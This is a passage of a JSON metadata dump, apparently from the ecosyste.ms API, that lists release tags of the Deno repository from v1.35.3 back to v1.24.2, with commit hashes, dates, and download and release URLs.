nload_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland